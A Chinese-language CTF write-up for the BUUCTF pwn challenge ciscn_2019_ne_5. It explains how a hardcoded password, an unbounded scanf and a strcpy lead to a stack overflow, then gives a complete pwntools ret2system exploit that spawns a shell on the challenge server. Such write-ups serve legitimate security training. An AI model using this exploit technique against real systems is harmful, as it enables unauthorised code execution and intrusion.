pwn刷题num37---栈溢出 + strcpy函数溢出

BUUCTF-PWN-ciscn_2019_ne_5

首先查保护–>看链接类型–>赋予程序可执行权限–>试运行

32位程序，小端序
开启部分RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接

程序运行后让我们输入密码，
ida一下看一下主函数

看来要想进行下面的操作，必须输入password：administrator
if ( strcmp(s1, “administrator”) )
{
puts(“Password Error!”);
exit(0);
}

之后我们可以看到这是一个菜单栏，可以添加一个log，展示所有log，打印所以log以及最后的退出程序

 case 4:
        GetFlag(src);
        break;

发现一个flag相关的函数，需要选4

哎，不行
看一下其他函数吧，看一下AddLog((int)src);

scanf，可以对a1输入任意长的字符串，会造成栈溢出
再查看一下GetFlag(src);

strcpy(dest, src);

这里的strcpy函数会把src赋值给dest，而sec就是我们在AddLog((int)src);函数里输入的a1，
看一下栈区


dest距离返回地址0x4c(0x48+0x4)字节

思路

先用密码administrator进入菜单栏，再输入1，增加一个log，输入0x4c字节，再把返回地址设为system函数地址

把system参数设为sh（/bin/sh找不到）

exp

from pwn import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'i386')
sh = remote('node4.buuoj.cn',26659)
sh_addr = 0x080482ea 
sh.sendlineafter(b'Please input admin password:',b'administrator') 
sh.sendlineafter(b'0.Exit\n:',b'1')
system_addr = 0x080484D0
payload = flat([b'a' * (0x48 + 0x4),system_addr,b'b' * 4,sh_addr])
sh.sendlineafter(b'info:',payload)
sh.recvuntil('0.Exit\n:')
sh.sendline('4')
sh.interactive()

运行获得shell